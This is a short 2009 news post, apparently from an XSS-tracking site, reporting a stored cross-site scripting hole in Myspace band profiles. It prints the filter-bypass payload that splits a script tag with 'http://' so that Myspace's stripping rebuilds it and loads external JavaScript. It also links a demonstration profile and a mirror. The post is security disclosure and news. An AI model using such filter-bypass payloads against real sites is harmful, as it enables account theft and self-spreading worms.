Advertisements

 Myspace.com hit by a Permanent XSS

Written by KF

Wednesday, 28 January 2009

Note 02/02/09: TrainReq (Josh Holly) reportedly discovered first the vulnerability, in the film profiles.

Daniel Lo Nigro has discovered a trick to bypass the Myspace filters and insert a script on a Myspace band profile. Myspace prevents <script> from behing written in a band website URL but strips out "http://" from it, it can therefore be exploited this way:

URL: test.com?<scrihttp://pt src=//site.com/xss.js>

Or have a look at Daniel's harmless example:

http://www.myspace.com/index.cfm?fuseaction=user.viewprofile&friendID=446695851

Daniel says he alerted Myspace but that they never answered him.

Here is the mirror of the XSS:

http://xssed.com/mirror/57181/

This XSS could be exploited to spread a worm, steal myspace accounts..

In the past Myspace was hit by a number of security issues, including the "Samy" XSS worm.


        
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.